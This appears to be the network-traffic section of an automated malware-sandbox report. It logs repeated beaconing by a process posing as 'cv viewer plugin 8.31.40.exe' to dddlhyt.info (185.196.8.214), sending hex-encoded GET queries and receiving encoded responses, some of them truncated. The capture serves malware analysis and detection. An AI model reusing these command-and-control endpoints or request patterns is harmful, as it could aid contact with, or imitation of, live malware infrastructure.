                                                  Aug 31, 2024 22:13:51.204446077 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:51 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20
                                                  Aug 31, 2024 22:13:51.317889929 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:51.559140921 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:51 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20
                                                  Aug 31, 2024 22:13:51.673010111 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:51.914890051 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:51 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  30192.168.2.949750185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:13:52.037587881 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:52.748502970 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:52 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20
                                                  Aug 31, 2024 22:13:52.858273983 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:53.098416090 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:53 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  31192.168.2.949751185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:13:53.223984003 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:53.914094925 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:53 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  32192.168.2.949752185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:13:54.037296057 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:54.739670038 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:54 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  33192.168.2.949753185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:13:54.864381075 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:55.569820881 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:55 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  34192.168.2.949754185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:13:55.691790104 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:56.398533106 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:56 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  35192.168.2.949755185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:13:56.520169020 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:57.213263988 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:57 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  36192.168.2.949756185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:13:57.338046074 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:58.050796032 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:57 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  37192.168.2.949757185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:13:58.236208916 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:58.928915977 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:58 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  38192.168.2.949758185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:13:59.051496029 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:59.758272886 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:59 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  39192.168.2.949759185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:13:59.892970085 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:14:00.588644981 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:14:00 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  40192.168.2.949760185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:14:00.707350969 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:14:01.396085024 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:14:01 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  41192.168.2.949761185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:14:01.520057917 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:14:02.219222069 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:14:02 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  42192.168.2.949762185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:14:02.348289967 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:14:03.032706022 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:14:02 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  43192.168.2.949763185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:14:03.167870998 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:14:04.062833071 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:14:03 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  44192.168.2.949764185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:14:04.194269896 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:14:04.923839092 CEST1190INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:14:04 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 33 64 36 0d 0a 36 37 62 36 38 61 38 61 33 32 30 33 61 37 37 62 30 34 31 38 66 35 35 66 36 37 37 63 38 31 63 34 35 39 66 65 38 62 64 32 65 39 31 66 31 65 66 35 61 32 35 63 65 39 31 35 38 35 62 63 63 66 62 35 66 62 63 34 30 61 64 39 30 38 38 62 65 38 64 65 32 32 36 36 65 32 30 38 61 36 62 62 39 64 35 39 32 64 65 62 37 36 35 61 62 33 37 32 66 30 37 39 61 38 33 31 35 63 64 65 66 37 64 33 30 32 63 31 34 33 63 64 37 64 62 62 31 31 66 62 32 64 38 62 32 33 65 30 30 65 61 37 36 32 63 35 34 64 62 39 65 30 34 66 65 37 35 62 37 66 34 33 65 63 32 66 36 36 39 30 33 63 37 39 38 37 66 66 30 66 63 32 65 65 39 34 38 34 33 61 63 62 36 66 39 63 31 32 64 38 35 30 38 66 32 31 62 37 35 31 62 36 66 37 35 39 32 31 66 33 37 61 64 31 66 38 36 37 62 31 38 65 65 35 64 37 34 61 65 36 33 65 63 32 31 34 33 34 35 66 34 34 32 35 65 62 33 62 37 33 30 39 36 32 61 37 65 64 38 65 66 61 38 63 32 38 35 31 65 36 35 37 37 61 32 32 66 62 33 34 35 63 66 66 66 64 66 39 38 64 66 65 33 66 36 35 61 36 65 64 34 35 39 38 38 37 66 62 37 61 32 37 31 [TRUNCATED]
                                                  Data Ascii: 3d667b68a8a3203a77b0418f55f677c81c459fe8bd2e91f1ef5a25ce91585bccfb5fbc40ad9088be8de2266e208a6bb9d592deb765ab372f079a8315cdef7d302c143cd7dbb11fb2d8b23e00ea762c54db9e04fe75b7f43ec2f66903c7987ff0fc2ee94843acb6f9c12d8508f21b751b6f75921f37ad1f867b18ee5d74ae63ec214345f4425eb3b730962a7ed8efa8c2851e6577a22fb345cfffdf98dfe3f65a6ed459887fb7a2718b46af19ec8ac64d06a1b293467a656ceddad322fb2c110ba03bbbc33bfdbc9347e280ed330e012ead7a00246cc3d10c74bdaf360972cb7965ea9e6d5b6c73d3db87fa3ef0993aabf735aa08cf529a8e087831cf317e044814f69c5b4c1fdd84164a687ec3db175880e29a926d432de9f00cb56b439010257cac96f5f3e4c6484fe842f2c604f1bc9c7af1113f5c8bfe9c3357872ed3e85c20500499eb4c50b4f5add796b5d3a44e2d1d2ccfbcb5a99226e50f67d2a832bbcce937f8a5fc9883e1d0e6983f59aec060ea12780dd127308de36d2f6900c6834749a2b01ec56407e678647d2b0bdef34bdd0c7104c8c2dcb48508db2d76ed15025b569e63327b6639e561fc9aea7ae6fa7cb0d9a4bc8dfcf4ab316b45dfca7b3659bae38fb6a7154589bdc2f45b7acdd1c37ac76576a455b9c23bc15f940c11ad0a2cd984fff448289b9c51b0
                                                  Aug 31, 2024 22:14:07.546736956 CEST323OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:14:07.832704067 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:14:07 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  45192.168.2.949766185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:14:07.958017111 CEST323OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:14:08.667881966 CEST1046INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:14:08 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 33 34 36 0d 0a 36 37 62 36 39 63 39 35 33 38 30 34 62 32 36 62 35 36 35 66 65 39 35 62 33 32 31 62 64 31 39 61 35 35 66 63 38 66 63 65 66 35 31 38 31 39 66 35 61 32 35 36 65 33 31 64 64 64 66 39 38 31 65 63 39 34 38 37 34 64 38 62 34 64 64 37 66 62 64 66 33 31 33 33 62 39 34 64 66 61 64 34 64 61 31 62 32 33 65 38 37 64 35 39 61 64 37 35 66 36 36 63 61 38 33 36 35 32 64 65 66 37 64 33 31 36 63 32 34 32 63 63 36 33 62 31 31 36 66 66 33 39 38 65 32 36 65 34 31 30 61 64 36 37 63 64 35 36 61 35 65 35 34 65 66 33 35 62 37 63 34 36 66 32 32 63 36 36 39 66 33 39 36 37 38 65 66 66 31 61 63 32 65 65 39 37 38 34 33 65 63 35 37 31 39 37 31 37 64 63 34 65 38 65 32 39 62 32 35 33 62 36 65 39 35 66 32 61 65 63 37 38 64 37 65 33 37 38 62 31 38 65 66 31 64 34 34 65 65 37 32 30 63 62 31 36 33 37 35 37 35 39 32 30 65 33 32 35 37 39 30 31 36 34 61 37 65 61 38 65 65 30 38 37 32 63 35 30 66 38 35 64 37 65 32 32 66 34 32 62 35 64 66 37 66 63 65 63 38 64 66 32 33 36 36 35 61 36 65 65 34 35 38 63 38 35 66 63 36 34 32 35 31 [TRUNCATED]
                                                  Data Ascii: 34667b69c953804b26b565fe95b321bd19a55fc8fcef51819f5a256e31dddf981ec94874d8b4dd7fbdf3133b94dfad4da1b23e87d59ad75f66ca83652def7d316c242cc63b116ff398e26e410ad67cd56a5e54ef35b7c46f22c669f39678eff1ac2ee97843ec5719717dc4e8e29b253b6e95f2aec78d7e378b18ef1d44ee720cb1637575920e325790164a7ea8ee0872c50f85d7e22f42b5df7fcec8df23665a6ee458c85fc642517b76aef98cbb964d56d1b2d387aae54cdc3ac392db0c80eb800b2a637a6c2cd2e722d10d133e319edd1be0744d33716da57def07d9e2fa9975da7e8d1a8c03b28bd7fa3ef0d85a1bd7244a283f42baefe858614ec1ce744864c72ceb6c4e3d94b65ab9cee3aaf7f8f0a29aa22dc26da9f1eca5abc3b051c51cadc675f25536d86e2872e3267461acec2b11018fcdfbdf7df2a777af93e86c8040b409da1cd075245d1756b583748fdd0d5c4facf539c376f4fe07e358636b7ca94618955ca8a201c0b6a95ff80e21811a72a8ac6137300d731ccf4910375346f9f3406f35d437979844edcb2a0e734a3dac31857932ccc43488bb1c96cd8523bb768d20
                                                  Aug 31, 2024 22:14:08.782423973 CEST323OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:14:09.020556927 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:14:08 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  46192.168.2.949768185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
